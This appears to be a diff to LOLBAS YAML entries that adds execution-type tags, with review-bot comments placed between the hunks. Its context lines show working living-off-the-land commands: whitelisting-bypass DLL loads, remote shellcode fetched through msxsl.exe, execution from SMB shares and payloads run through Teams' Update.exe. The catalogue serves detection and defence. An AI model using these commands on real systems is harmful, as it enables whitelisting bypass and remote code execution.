diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml
index be527dad5..23154c192 100644
--- a/yml/OtherMSBinaries/AccCheckConsole.yml
+++ b/yml/OtherMSBinaries/AccCheckConsole.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218
 OperatingSystem: Windows
 Tags:
- - Execute: DLL
+ - Execute: DLL (.NET)
 - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
 Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
 Usecase: Local execution of managed code to bypass AppLocker.
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1218
 OperatingSystem: Windows
 Tags:
- - Execute: DLL
+ - Execute: DLL (.NET)
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml
index 006c8b4d0..142ad7a7c 100644
--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -18,6 +18,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: All Windows
+ Tags:
+ - Execute: CMD
 - Command: adplus.exe -c config-adplus.xml
 Description: Dump process memory using adplus config file (see Resources section for a sample file).
 Usecase: Run commands under a trusted Microsoft signed binary
@@ -32,6 +34,9 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: All windows
+ Tags:
+ - Execute: CMD
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
 - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml
index 8bb87dc51..5e95bac2b 100644
--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10
+ Tags:
+ - Execute: PowerShell
 - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
 Usecase: Execute a provided EXE
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Appcert.yml b/yml/OtherMSBinaries/Appcert.yml
index 30b817ba9..a423ff30e 100644
--- a/yml/OtherMSBinaries/Appcert.yml
+++ b/yml/OtherMSBinaries/Appcert.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
 Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
 Usecase: Execute custom made MSI file with malicious code
@@ -18,6 +20,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1218.007
 OperatingSystem: Windows
+ Tags:
+ - Execute: MSI
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe
 - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe
diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml
index 54678dbd1..620916d6d 100644
--- a/yml/OtherMSBinaries/Appvlp.yml
+++ b/yml/OtherMSBinaries/Appvlp.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 w/Office 2016
+ Tags:
+ - Execute: CMD
 - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
 Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
 Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 w/Office 2016
+ Tags:
+ - Execute: EXE
 - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
 Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
 Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@@ -25,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 w/Office 2016
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
 - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml
index 386361e1f..c61401a86 100644
--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
@@ -49,6 +49,7 @@ Commands:
 OperatingSystem: Windows
 Tags:
 - Execute: WSH
+ - Execute: Remote
 - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
 Usecase: Remote execution of VBScript
 Description: This style of execution may not longer work due to patch.
@@ -58,6 +59,7 @@ Commands:
 OperatingSystem: Windows
 Tags:
 - Execute: WSH
+ - Execute: Remote
 Full_Path:
 - Path: no default
 Detection:
diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml
index 290e847cf..87aa504e8 100644
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: Shellcode
 - Command: |
 cdb.exe -pd -pn
 .shell
@@ -20,6 +22,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: CMD
 - Command: cdb.exe -c C:\debug-script.txt calc
 Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
 Usecase: Run commands under a trusted Microsoft signed binary
@@ -27,6 +31,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
 - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml
index b2fb1f745..7bbacc260 100644
--- a/yml/OtherMSBinaries/Coregen.yml
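Review bot: The `Execute: EXE` tag added at `@@ -25,6 +29,8 @@` of Appvlp.yml describes the preceding entry, whose command ends in `RegisterXLL('\\webdav\xll_poc.xll')`, an Excel add-in loaded from a WebDAV path. This commit gives the comparable SMB/WebDAV entries in Desk.yml and Bginfo.yml a `- Execute: Remote` tag, so that tag appears to be missing here. An XLL is a DLL loaded into the Excel process rather than a spawned executable, so `Execute: DLL` may also be a closer fit than EXE, depending on how the tag vocabulary is defined. The entry's Command line sits in the previous hunk's context, not in this one.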
+++ b/yml/OtherMSBinaries/Coregen.yml
@@ -20,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1055
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
 - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
 Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
 Usecase: Execute DLL code
diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml
index 991c1bdef..2a1586662 100644
--- a/yml/OtherMSBinaries/Csi.yml
+++ b/yml/OtherMSBinaries/Csi.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: CSharp
 Full_Path:
 - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
 - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml
index a63da1507..a72e4b683 100644
--- a/yml/OtherMSBinaries/DefaultPack.yml
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml
index 2ed83b489..e02a70019 100644
--- a/yml/OtherMSBinaries/Devinit.yml
+++ b/yml/OtherMSBinaries/Devinit.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1218.007
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: MSI
+ - Execute: Remote
 Full_Path:
 - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe
diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml
index 2a67dc63a..f6f9eeae6 100644
--- a/yml/OtherMSBinaries/Devtoolslauncher.yml
+++ b/yml/OtherMSBinaries/Devtoolslauncher.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 7 and up with VS/VScode installed
+ Tags:
+ - Execute: CMD
 - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
 Description: The above binary will execute other binary.
 Usecase: Execute any binary with given arguments.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 7 and up with VS/VScode installed
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: 'c:\windows\system32\devtoolslauncher.exe'
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml
index 44a00cd24..f54457e10 100644
--- a/yml/OtherMSBinaries/Dnx.yml
+++ b/yml/OtherMSBinaries/Dnx.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: CSharp
 Full_Path:
 - Path: no default
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml
index 39b59be44..16b369ed5 100644
--- a/yml/OtherMSBinaries/Dotnet.yml
+++ b/yml/OtherMSBinaries/Dotnet.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with .NET installed
+ Tags:
+ - Execute: DLL (.NET)
 - Command: dotnet.exe [PATH_TO_DLL]
 Description: dotnet.exe will execute any DLL.
 Usecase: Execute DLL
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with .NET installed
+ Tags:
+ - Execute: DLL (.NET)
 - Command: dotnet.exe fsi
 Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
 Usecase: Execute arbitrary F# code
@@ -25,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1059
 OperatingSystem: Windows 10 and up with .NET SDK installed
+ Tags:
+ - Execute: FSharp
 - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
 Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
 Usecase: Execute code bypassing AWL
@@ -32,6 +38,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 and up with .NET Core installed
+ Tags:
+ - Execute: CSharp
 Full_Path:
 - Path: 'C:\Program Files\dotnet\dotnet.exe'
 Detection:
diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml
index 72b014540..05ac2aad3 100644
--- a/yml/OtherMSBinaries/Dxcap.yml
+++ b/yml/OtherMSBinaries/Dxcap.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\dxcap.exe
 - Path: C:\Windows\SysWOW64\dxcap.exe
diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml
index fb183235c..6058ea53f 100644
--- a/yml/OtherMSBinaries/Fsi.yml
+++ b/yml/OtherMSBinaries/Fsi.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1059
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: FSharp
 - Command: fsi.exe
 Description: Execute F# code via interactive command line
 Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1059
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: FSharp
 Full_Path:
 - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml
index 5b55e35a8..4241cbe4e 100644
--- a/yml/OtherMSBinaries/FsiAnyCpu.yml
+++ b/yml/OtherMSBinaries/FsiAnyCpu.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1059
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: FSharp
 - Command: fsianycpu.exe
 Description: Execute F# code via interactive command line
 Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1059
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: FSharp
 Full_Path:
 - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml
index 09c960a8c..c564efacc 100644
--- a/yml/OtherMSBinaries/Mftrace.yml
+++ b/yml/OtherMSBinaries/Mftrace.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 - Command: Mftrace.exe powershell.exe
 Description: Launch cmd.exe as a subprocess of Mftrace.exe.
 Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe
diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
index 9ac12c29a..7ca4f43f5 100644
--- a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
+++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml
index cc3754cfb..7cc092177 100644
--- a/yml/OtherMSBinaries/Msdeploy.yml
+++ b/yml/OtherMSBinaries/Msdeploy.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
+ Tags:
+ - Execute: CMD
 - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
 Description: Launch calc.bat via msdeploy.exe.
 Usecase: Local execution of batch file using msdeploy.exe.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
+ Tags:
+ - Execute: CMD
 - Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe
 Description: Copy file from source to destination.
 Usecase: Copy file.
diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml
index 7020e0a22..d87746e4d 100644
--- a/yml/OtherMSBinaries/Msxsl.yml
+++ b/yml/OtherMSBinaries/Msxsl.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1220
 OperatingSystem: Windows
+ Tags:
+ - Execute: XSL
 - Command: msxsl.exe customers.xml script.xsl
 Description: Run COM Scriptlet code within the script.xsl file (local).
 Usecase: Local execution of script stored in XSL file.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1220
 OperatingSystem: Windows
+ Tags:
+ - Execute: XSL
 - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
 Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
 Usecase: Local execution of remote script stored in XSL script stored as an XML file.
@@ -25,6 +29,9 @@ Commands:
 Privileges: User
 MitreID: T1220
 OperatingSystem: Windows
+ Tags:
+ - Execute: XSL
+ - Execute: Remote
 - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
 Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
 Usecase: Local execution of remote script stored in XSL script stored as an XML file.
@@ -32,6 +39,9 @@ Commands:
 Privileges: User
 MitreID: T1220
 OperatingSystem: Windows
+ Tags:
+ - Execute: XSL
+ - Execute: Remote
 - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o
 Description: Using remote XML and XSL files, save the transformed XML file to disk.
 Usecase: Download a file from the internet and save it to disk.
diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml
index 81d00e300..d56eaca2e 100644
--- a/yml/OtherMSBinaries/OpenConsole.yml
+++ b/yml/OtherMSBinaries/OpenConsole.yml
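Review bot: The tag sets added at `@@ -25,6 +29,9 @@` and `@@ -32,6 +39,9 @@` of Msxsl.yml go onto two entries whose Command, Description and Usecase lines are identical (the shellcode.xml entry appears twice in the context), so the file ends up with a duplicated entry carrying duplicated tags. The same commit removes exactly this kind of duplicate in pester.yml; dropping one of the two entries here instead of tagging both would keep that cleanup consistent. If the two entries were meant to differ, the second should be edited rather than tagged as-is.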
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml
index 22d880c49..7090e1e74 100644
--- a/yml/OtherMSBinaries/Rcsi.yml
+++ b/yml/OtherMSBinaries/Rcsi.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: CSharp
 - Command: rcsi.exe bypass.csx
 Description: Use embedded C# within the csx script to execute the code.
 Usecase: Local execution of arbitrary C# code stored in local CSX file.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: CSharp
 Full_Path:
 - Path: no default
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml
index 6ea1d455f..cb63fb6bc 100644
--- a/yml/OtherMSBinaries/Remote.yml
+++ b/yml/OtherMSBinaries/Remote.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 - Command: Remote.exe /s "powershell.exe" anythinghere
 Description: Spawns powershell as a child process of remote.exe
 Usecase: Executes a process under a trusted Microsoft signed binary
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
 Description: Run a remote file
 Usecase: Executing a remote binary without saving file to disk
@@ -25,6 +29,9 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
+ - Execute: Remote
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
 - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml
index 906ca523e..e495ef0de 100644
--- a/yml/OtherMSBinaries/Sqlps.yml
+++ b/yml/OtherMSBinaries/Sqlps.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: PowerShell
 Full_Path:
 - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
 - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml
index c17ee4a47..b7c66aa0a 100644
--- a/yml/OtherMSBinaries/Sqltoolsps.yml
+++ b/yml/OtherMSBinaries/Sqltoolsps.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: PowerShell
 Full_Path:
 - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml
index 0055ff320..a8207ad98 100644
--- a/yml/OtherMSBinaries/Squirrel.yml
+++ b/yml/OtherMSBinaries/Squirrel.yml
@@ -18,6 +18,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: squirrel.exe --update [url to package]
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
 Usecase: Download and execute binary
@@ -25,6 +28,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: squirrel.exe --updateRollback=[url to package]
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
 Usecase: Download and execute binary
@@ -32,6 +38,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: squirrel.exe --updateRollback=[url to package]
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
 Usecase: Download and execute binary
@@ -39,6 +48,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 Full_Path:
 - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe'
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml
index 5c3bdb53f..d5d0580c1 100644
--- a/yml/OtherMSBinaries/Te.yml
+++ b/yml/OtherMSBinaries/Te.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: WSH
 - Command: te.exe test.dll
 Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.
 Usecase: Execute DLL file.
diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml
index fffb4b1ff..622843c13 100644
--- a/yml/OtherMSBinaries/Teams.yml
+++ b/yml/OtherMSBinaries/Teams.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.015
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: Node.JS
 - Command: teams.exe
 Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
 Usecase: Execute JavaScript code
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.015
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: Node.JS
 - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
 Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
 Usecase: Executes a process under a trusted Microsoft signed binary
@@ -25,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1218.015
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Teams.exe'
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml
index f4049a496..1dde3d0a0 100644
--- a/yml/OtherMSBinaries/Update.yml
+++ b/yml/OtherMSBinaries/Update.yml
@@ -18,6 +18,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --update=[url to package]
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
 Usecase: Download and execute binary
@@ -25,6 +28,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --update=\\remoteserver\payloadFolder
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
 Usecase: Download and execute binary
@@ -32,6 +38,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --update=\\remoteserver\payloadFolder
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
 Usecase: Download and execute binary
@@ -39,6 +48,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --updateRollback=[url to package]
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
 Usecase: Download and execute binary
@@ -46,6 +58,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --updateRollback=[url to package]
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
 Usecase: Download and execute binary
@@ -53,6 +68,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
 Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
 Usecase: Application Whitelisting Bypass
@@ -60,6 +78,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: CMD
+ - Execute: Remote
